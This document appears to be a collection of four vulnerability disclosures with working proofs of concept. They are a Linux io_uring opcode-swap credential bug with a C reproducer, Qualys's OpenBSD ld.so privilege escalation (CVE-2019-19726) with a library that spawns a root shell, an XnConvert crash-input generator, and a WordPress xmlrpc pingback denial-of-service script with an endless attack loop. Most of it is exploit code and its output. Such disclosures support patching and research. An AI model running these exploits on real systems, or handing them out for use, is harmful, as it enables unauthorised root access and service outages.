Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3),
io_uring has support for asynchronously calling sendmsg().
Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
entries, which cause sendmsg() to be called either in syscall context in the
original task, or - if that wasn't able to send a message without blocking - on
a kernel worker thread.
The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:
- sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
datagram socket ends up performing filesystem access checks
- sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
process credentials
- sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
capability checks against the calling process
When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.
To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times (a
double fetch from the user-mapped SQE ring), with accesses to the struct msghdr
in between: the attacker first submits an SQE of type IORING_OP_RECVMSG whose
struct msghdr points into a userfaultfd region (the reproducer below places the
msghdr's iovec page there), and then, when the userfaultfd triggers, switches the
type to IORING_OP_SENDMSG.
Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:
==========================================================================
$ cat uring_sendmsg.c
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
/* State shared between main() and the fault-handling thread. */
static int uffd = -1;              /* userfaultfd; created in main() */
static struct iovec *iov;          /* uffd-registered page; msghdr.msg_iov points here */
static struct iovec real_iov;      /* the iovec actually copied into that page on fault */
static struct io_uring_sqe *sqes;  /* shared SQE array; [0].opcode is flipped by uffd_thread */
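/*
 * Fault-handler thread: block until the kernel touches the uffd-registered
 * iovec page, flip the queued SQE from RECVMSG to SENDMSG, then resolve the
 * fault by copying the real iovec into the page.
 *
 * The opcode swap is what turns the request io_uring has already started
 * processing as a receive into a send (see the write-up above). dummy is
 * unused; it only satisfies the pthread_create() signature.
 *
 * The listing had "&copy" mangled into "©" by HTML entity decoding; the
 * address-of operator is restored here.
 */
static void *uffd_thread(void *dummy) {
  (void)dummy;
  struct uffd_msg msg;
  int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
  if (res != sizeof(msg)) errx(1, "uffd read");
  printf("got userfaultfd message\n");
  sqes[0].opcode = IORING_OP_SENDMSG;
  /* Pad the source to a full page: the copy covers the whole 0x1000-byte
   * registered range, of which only the leading iovec matters. */
  union {
    struct iovec iov;
    char pad[0x1000];
  } vec = {
    .iov = real_iov
  };
  struct uffdio_copy copy = {
    .dst = (unsigned long)iov,
    .src = (unsigned long)&vec,
    .len = 0x1000
  };
  SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
  return NULL;
}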
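/*
 * Reproducer: have io_uring execute a sendmsg() on a kernel worker with
 * kernel credentials and use it to add 1.2.3.4/32 to interface index 1 (lo
 * in the session below) via RTM_NEWADDR, which normally needs privileges.
 *
 * Sequence:
 *  1. set up a 10-entry ring and map the SQ ring, CQ ring and SQE array;
 *  2. register a fresh anonymous page as a userfaultfd MISSING range and
 *     start uffd_thread; the msghdr's iovec will live in that page;
 *  3. build the netlink RTM_NEWADDR message and an msghdr that points at
 *     the trapped iovec page;
 *  4. queue it as IORING_OP_RECVMSG and submit; per the write-up above the
 *     kernel faults on the iovec page, uffd_thread rewrites the opcode to
 *     IORING_OP_SENDMSG, and the request is carried out as a send;
 *  5. wait for one completion and print its result (32 == sizeof(msgbuf),
 *     i.e. the whole netlink message was sent).
 *
 * "&params" and "&reg" had been mangled into "¶ms" / "®" by HTML entity
 * decoding in the listing; both are restored here.
 */
int main(void) {
  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
  sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

  // prepare userfaultfd-trapped IO vector page (never touched from here, so
  // the first kernel access to it raises the MISSING fault)
  iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
  struct uffdio_register reg = {
    .mode = UFFDIO_REGISTER_MODE_MISSING,
    .range = { .start = (unsigned long)iov, .len = 0x1000 }
  };
  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
  pthread_t thread;
  if (pthread_create(&thread, NULL, uffd_thread, NULL))
    errx(1, "pthread_create");

  // construct netlink message: RTM_NEWADDR, IPv4 1.2.3.4/32 on ifindex 1
  int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
  struct sockaddr_nl addr = {
    .nl_family = AF_NETLINK
  };
  struct {
    struct nlmsghdr hdr;
    struct ifaddrmsg body;
    struct rtattr opthdr;
    unsigned char addr[4];
  } __attribute__((packed)) msgbuf = {
    .hdr = {
      .nlmsg_len = sizeof(msgbuf),
      .nlmsg_type = RTM_NEWADDR,
      .nlmsg_flags = NLM_F_REQUEST
    },
    .body = {
      .ifa_family = AF_INET,
      .ifa_prefixlen = 32,
      .ifa_flags = IFA_F_PERMANENT,
      .ifa_scope = 0,
      .ifa_index = 1
    },
    .opthdr = {
      .rta_len = sizeof(struct rtattr) + 4,
      .rta_type = IFA_LOCAL
    },
    .addr = { 1, 2, 3, 4 }
  };
  // real_iov is what uffd_thread copies into the trapped page on fault
  real_iov.iov_base = &msgbuf;
  real_iov.iov_len = sizeof(msgbuf);
  struct msghdr msg = {
    .msg_name = &addr,
    .msg_namelen = sizeof(addr),
    .msg_iov = iov,
    .msg_iovlen = 1,
  };

  // send netlink message via uring: queued as RECVMSG, flipped to SENDMSG
  // by uffd_thread while the kernel is stalled on the iovec page
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_RECVMSG,
    .fd = sock,
    .addr = (unsigned long)&msg
  };
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  (*(int*)(sq_ring + params.sq_off.tail))++;
  int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
  printf("submitted %d, getevents done\n", submitted);
  int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
  printf("cq_tail = %d\n", cq_tail);
  if (cq_tail != 1) errx(1, "expected cq_tail==1");
  struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
  // a negative res is a -errno from the (send)msg path
  if (cqe->res < 0) {
    printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res));
  } else {
    printf("result: %d\n", cqe->res);
  }
}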
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$ ./uring_sendmsg
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet 1.2.3.4/32 scope global lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$
==========================================================================
The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with override_creds().
(Or maybe commit_creds() - that would mean that you could actually see the
owning user of these threads in the output of something like "ps aux". On the
other hand, I'm not sure how that impacts stuff like signal sending, so
override_creds() might be safer.) It would mean that you can't safely use an
io_uring instance across something like a setuid() transition that drops
privileges, but that's probably not a big problem?
While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
it would probably be beneficial to mark such a change for backporting all the
way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
called from rw_verify_area() has so far always attributed all the I/O operations
to the kernel context, which isn't really a security problem, but might e.g.
cause unexpected denials depending on the SELinux policy.
Qualys Security Advisory
Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726)
==============================================================================
Contents
==============================================================================
Summary
Analysis
Demonstration
Acknowledgments
==============================================================================
Summary
==============================================================================
We discovered a Local Privilege Escalation in OpenBSD's dynamic loader
(ld.so): this vulnerability is exploitable in the default installation
(via the set-user-ID executable chpass or passwd) and yields full root
privileges.
We developed a simple proof of concept and successfully tested it
against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both
amd64 and i386; other releases and architectures are probably also
exploitable.
==============================================================================
Analysis
==============================================================================
In this section, we analyze a step-by-step execution of our proof of
concept:
------------------------------------------------------------------------------
1/ We execve() the set-user-ID /usr/bin/chpass, but first:
1a/ we set the LD_LIBRARY_PATH environment variable to one single dot
(the current working directory) and approximately ARG_MAX colons (the
maximum number of bytes for the argument and environment list); as
described in man ld.so:
LD_LIBRARY_PATH
A colon separated list of directories, prepending the default
search path for shared libraries. This variable is ignored for
set-user-ID and set-group-ID executables.
1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *)
(2MB on amd64, 1MB on i386); as described in man setrlimit:
RLIMIT_DATA The maximum size (in bytes) of the data segment for a
process; this includes memory allocated via malloc(3) and
all other anonymous memory mapped via mmap(2).
------------------------------------------------------------------------------
2/ Before the main() function of chpass is executed, the _dl_boot()
function of ld.so is executed and calls _dl_setup_env():
262 void
263 _dl_setup_env(const char *argv0, char **envp)
264 {
...
271 _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp));
...
283 _dl_trust = !_dl_issetugid();
284 if (!_dl_trust) { /* Zap paths if s[ug]id... */
285 if (_dl_libpath) {
286 _dl_free_path(_dl_libpath);
287 _dl_libpath = NULL;
288 _dl_unsetenv("LD_LIBRARY_PATH", envp);
289 }
------------------------------------------------------------------------------
3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH
environment variable and passes it to _dl_split_path():
23 char **
24 _dl_split_path(const char *searchpath)
25 {
..
35 pp = searchpath;
36 while (*pp) {
37 if (*pp == ':' || *pp == ';')
38 count++;
39 pp++;
40 }
..
45 retval = _dl_reallocarray(NULL, count, sizeof(*retval));
46 if (retval == NULL)
47 return (NULL);
------------------------------------------------------------------------------
4/ At line 45, count is approximately ARG_MAX (the number of colons in
our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our
low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL.
------------------------------------------------------------------------------
5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH
is ignored, but it is not deleted from the environment (CVE-2019-19726):
although _dl_trust is false (_dl_issetugid() returns true because chpass
is set-user-ID), _dl_unsetenv() is not called (line 288) because
_dl_libpath is NULL (line 285).
------------------------------------------------------------------------------
6/ Next, the main() function of chpass is executed, and it:
6a/ calls setuid(0), which sets the real and effective user IDs to 0;
6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY;
6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb
(unlike execve(), execv() does not reset the environment).
------------------------------------------------------------------------------
7/ Before the main() function of pwd_mkdb is executed, the _dl_boot()
function of ld.so is executed and calls _dl_setup_env():
7a/ at line 271, _dl_getenv() returns a pointer to our
LD_LIBRARY_PATH environment variable (because it was not deleted from
the environment in step 5, and because execv() did not reset the
environment in step 6c);
7b/ at line 45, _dl_reallocarray() does not return NULL anymore
(because our low RLIMIT_DATA was reset in step 6b);
7c/ as a result, _dl_libpath is not NULL (line 271), and it is not
reset to NULL (line 287) because _dl_trust is true (_dl_issetugid()
returns false because pwd_mkdb is not set-user-ID, and because the
real and effective user IDs were both set to 0 in step 6a): our
LD_LIBRARY_PATH is not ignored anymore.
------------------------------------------------------------------------------
8/ Finally, ld.so searches for shared libraries in _dl_libpath (our
LD_LIBRARY_PATH) and loads our own library from the current working
directory (the dot in our LD_LIBRARY_PATH).
------------------------------------------------------------------------------
==============================================================================
Demonstration
==============================================================================
In this section, we demonstrate the use of our proof of concept:
------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
$ cd /tmp
$ cat > lib.c << "EOF"
#include <paths.h>
#include <unistd.h>
/*
 * Runs when ld.so loads this library in place of libutil.so.13.1 inside
 * pwd_mkdb (see step 8 of the analysis). The process is already uid 0 at
 * that point; this makes uid and gid 0 (wheel) explicit and replaces the
 * process with a root shell. Each failure exits with the current source
 * line number, which only serves to tell the three failure points apart.
 */
static void __attribute__ ((constructor)) _init (void) {
  char * const args[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
  if (setuid(0) != 0)
    _exit(__LINE__);
  if (setgid(0) != 0)
    _exit(__LINE__);
  execve(_PATH_KSHELL, args, NULL);
  _exit(__LINE__);
}
EOF
$ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [libutil.so.13.1]
0x0000000000000001 (NEEDED) Shared library: [libc.so.95.1]
$ gcc -fpic -shared -s -o libutil.so.13.1 lib.c
$ cat > poc.c << "EOF"
#include <string.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <unistd.h>
/*
 * Launch the set-user-ID program named by argv[1..] with an environment and
 * a data limit crafted so that ld.so's _dl_split_path() fails to allocate
 * and therefore never removes LD_LIBRARY_PATH from the environment:
 *
 *  - LD_LIBRARY_PATH is "." followed by roughly ARG_MAX colons; the colon
 *    count is what _dl_reallocarray() is asked to allocate for.
 *  - RLIMIT_DATA is set to ARG_MAX * sizeof(char *), so that allocation
 *    cannot succeed (steps 1 and 4 of the analysis).
 *  - EDITOR is presumably set so chpass's editor step just appends a
 *    comment line instead of opening an interactive editor.
 *
 * Exits with the current source line number on any failure.
 */
int
main(int argc, char * const * argv)
{
#define LLP "LD_LIBRARY_PATH=."
  static char llp[ARG_MAX - 128];
  /* Prefix first, then colons up to the final byte, which stays NUL
   * because the buffer is static. */
  memcpy(llp, LLP, sizeof(LLP) - 1);
  memset(llp + sizeof(LLP) - 1, ':', sizeof(llp) - sizeof(LLP));
  char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
#define DATA (ARG_MAX * sizeof(char *))
  const struct rlimit data = { DATA, DATA };
  if (setrlimit(RLIMIT_DATA, &data) != 0)
    _exit(__LINE__);
  if (argc <= 1)
    _exit(__LINE__);
  execve(argv[1], argv + 1, envp);
  _exit(__LINE__);
}
EOF
$ gcc -s -o poc poc.c
$ ./poc /usr/bin/chpass
# id
uid=0(root) gid=0(wheel) groups=32767(nobody)
------------------------------------------------------------------------------
==============================================================================
Acknowledgments
==============================================================================
We thank Theo de Raadt and the OpenBSD developers for their incredibly
quick response: they published a patch for this vulnerability in less
than 3 hours. We also thank MITRE's CVE Assignment Team.
# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64
# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open Evil.txt (written by the script to the current directory) and copy its content to the clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK'. A pop-up stating that the code is invalid appears; click 'OK' again and the application crashes.
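#!/usr/bin/env python
"""Generate the oversized registration-code string that crashes XnConvert 1.82.

Writes PAYLOAD_SIZE 'A' (0x41) characters to Evil.txt in the current
directory; paste that file's content into the 'User Name and Registration
Code' field as described in the steps above. Nothing here touches XnConvert
itself, it only produces the input.
"""

PAYLOAD_SIZE = 9000  # number of 'A's; the length the original PoC crashed with
PAYLOAD_FILE = "Evil.txt"  # the steps above call it EVIL.txt; same file on Windows


def build_payload(size=PAYLOAD_SIZE):
    """Return the crash string: *size* repetitions of 'A'."""
    return "\x41" * size


def write_payload(path=PAYLOAD_FILE, size=PAYLOAD_SIZE):
    """Write the payload to *path* and return the number of characters written.

    The file is opened with a context manager so the handle is closed even if
    the write fails (the original wrote char-by-char via writelines and
    closed the handle manually).
    """
    payload = build_payload(size)
    with open(path, "w") as handle:
        handle.write(payload)
    return len(payload)


if __name__ == "__main__":
    write_payload()
    print("File created")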
#!/usr/bin/env python
# WordPress <= 5.3.? Denial-of-Service PoC
# Abusing pingbacks+xmlrpc multicall to exhaust connections
# @roddux 2019 | Arcturus Security | labs.arcturus.net
# TODO:
# - Try and detect a pingback URL on target site
# - Optimise number of entries per request, check class-wp-xmlrpc-server.php
from urllib.parse import urlparse
import sys, uuid, urllib3, requests
# Silence urllib3's InsecureRequestWarning: every request below is sent with
# verify=False so self-signed or mismatched TLS on the target does not abort the run.
urllib3.disable_warnings()
DEBUG = True  # when True, dprint() echoes the full XML-RPC body before it is sent
def dprint(X):
    """Print *X* only when the module-level DEBUG flag is set; otherwise a no-op."""
    if not DEBUG:
        return
    print(X)
COUNT=0  # running sequence number appended to each pingback source URL by build_entry()
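def build_entry(pingback, target, seq=None):
    """Return one ``pingback.ping`` call for a ``system.multicall`` array.

    Each call asks the target to verify the source URL ``{pingback}/{seq}``
    against ``{target}/?p=1``. The sequence number presumably keeps every
    call distinct (the commented-out uuid variant in the original served the
    same purpose).

    Args:
        pingback: base URL the target will be made to fetch.
        target: base URL of the WordPress site under test.
        seq: explicit sequence number. When None (the default, and what the
            existing callers use) the module-level COUNT is incremented and
            used, exactly as before.

    Returns:
        The ``<value>...</value>`` XML fragment for this call. Both URLs are
        XML-escaped so a query string containing ``&`` no longer produces a
        malformed document; plain URLs are emitted unchanged.
    """
    from xml.sax.saxutils import escape

    global COUNT
    if seq is None:
        COUNT += 1
        seq = COUNT
    source = escape(f"{pingback}/{seq}")
    dest = escape(f"{target}/?p=1")
    return (
        "<value><struct>"
        "<member><name>methodName</name><value>pingback.ping</value></member>"
        "<member><name>params</name><value><array><data>"
        f"<value>{source}</value><value>{dest}</value>"
        "</data></array></value></member>"
        "</struct></value>"
    )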
def build_request(pingback, target, entries):
    """Wrap *entries* pingback.ping calls in one ``system.multicall`` request.

    ``entries`` is the multicall fan-out: a single HTTP POST makes the target
    process that many pingbacks. Returns the complete XML-RPC request body.
    """
    head = "<methodCall><methodName>system.multicall</methodName><params><param><array>"
    tail = "</array></param></params></methodCall>"
    calls = "".join(build_entry(pingback, target) for _ in range(entries))
    return head + calls + tail
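def usage_die():
    """Print the command-line synopsis and terminate with exit status 1.

    Uses sys.exit rather than the site-provided exit() builtin, which is not
    guaranteed to exist (e.g. under ``python -S``).
    """
    print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>")
    sys.exit(1)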
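def get_args(argv=None):
    """Validate the command line and return ``(action, pingback, target)``.

    Args:
        argv: argument vector to parse; defaults to sys.argv. Expected layout
            is ``[prog, action, pingback_url, target_url]``.

    Returns:
        The action ("check" or "attack") and the two URLs, unchanged.

    Exits via usage_die() when the argument count is wrong, the action is
    unknown, or either URL lacks a scheme or a host. The URL check is only a
    sanity check: urlparse accepts almost anything, so typos still reach the
    request stage.
    """
    if argv is None:
        argv = sys.argv
    if len(argv) != 4:
        usage_die()
    action, pingback, target = argv[1:4]
    if action not in ("check", "attack"):
        usage_die()
    for url in (pingback, target):
        parts = urlparse(url)
        if not (parts.scheme and parts.netloc):
            usage_die()
    return (action, pingback, target)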
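def main(action, pingback, target):
    """Run the PoC in *check* (2 calls, one request) or *attack* mode.

    Attack mode POSTs a 2000-call multicall to ``{target}/xmlrpc.php`` in a
    tight loop until CTRL+C. Per the header comment the goal is to exhaust
    the target's connections through the pingbacks it is made to issue, so
    the pingback URL should point at a host you control and that the target
    can reach. Only run this against systems you are authorised to test.

    Args:
        action: "check" or "attack" (already validated by get_args).
        pingback: URL the target will be made to fetch for every call.
        target: base URL of the WordPress site.

    Raises:
        ValueError: if *action* is neither "check" nor "attack" (previously
            this surfaced later as a NameError on ``entries``).

    Exits with status 0 after a finished attack, 1 on a failed check request.
    Interpreting the check response is left to the operator (see the last
    print of the check branch).
    """
    print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
    print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")
    # check: the smallest request that still exercises multicall;
    # attack: a large fan-out per POST
    if action == "check":
        entries = 2
    elif action == "attack":
        entries = 2000
    else:
        raise ValueError(f"unknown action {action!r}")
    print(f"[+] Running in {action} mode")
    print(f"[+] Got pingback URL \"{pingback}\"")
    print(f"[+] Got target URL \"{target}\"")
    print(f"[+] Building {entries} pingback calls")
    xmldata = build_request(pingback, target, entries)
    dprint("[+] Request:\n")
    dprint(xmldata + "\n")
    print(f"[+] Request size: {len(xmldata)} bytes")
    endpoint = f"{target}/xmlrpc.php"

    if action == "attack":
        print("[+] Starting attack loop, CTRL+C to stop...")
        rcount = 0
        try:
            while True:
                try:
                    # Short timeout on purpose: the loop does not wait for the
                    # server to work through the pingbacks, it only queues more.
                    resp = requests.post(endpoint, xmldata, verify=False, allow_redirects=False, timeout=.2)
                    if resp.status_code != 200:
                        print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
                except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
                    # A timeout or refused connection is the expected sign of a
                    # saturated target, not an error for this tool.
                    pass
                rcount += 1
                print(f"\r[+] Requests sent: {rcount}", end="")
        except KeyboardInterrupt:
            print("\n[>] Attack finished", end="\n\n")
            sys.exit(0)
    elif action == "check":
        print("[+] Sending check request")
        try:
            resp = requests.post(endpoint, xmldata, verify=False, allow_redirects=False, timeout=10)
        except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
            print("[!] Connection error")
            sys.exit(1)
        if resp.status_code != 200:
            print(f"[!] Received odd status ({resp.status_code}) -- check target url")
        print("[+] Request sent")
        print("[+] Response headers:\n")
        print(resp.headers)
        print("[+] Response dump:")
        # errors="replace": a non-UTF-8 body (e.g. an error page) must not crash the check
        print(resp.content.decode("UTF-8", errors="replace"))
        print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
        print("[>] Check finished")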
# Script entry point: argv is parsed and validated first, so usage errors exit
# before any traffic is sent.
if __name__ == "__main__":
    main(*get_args())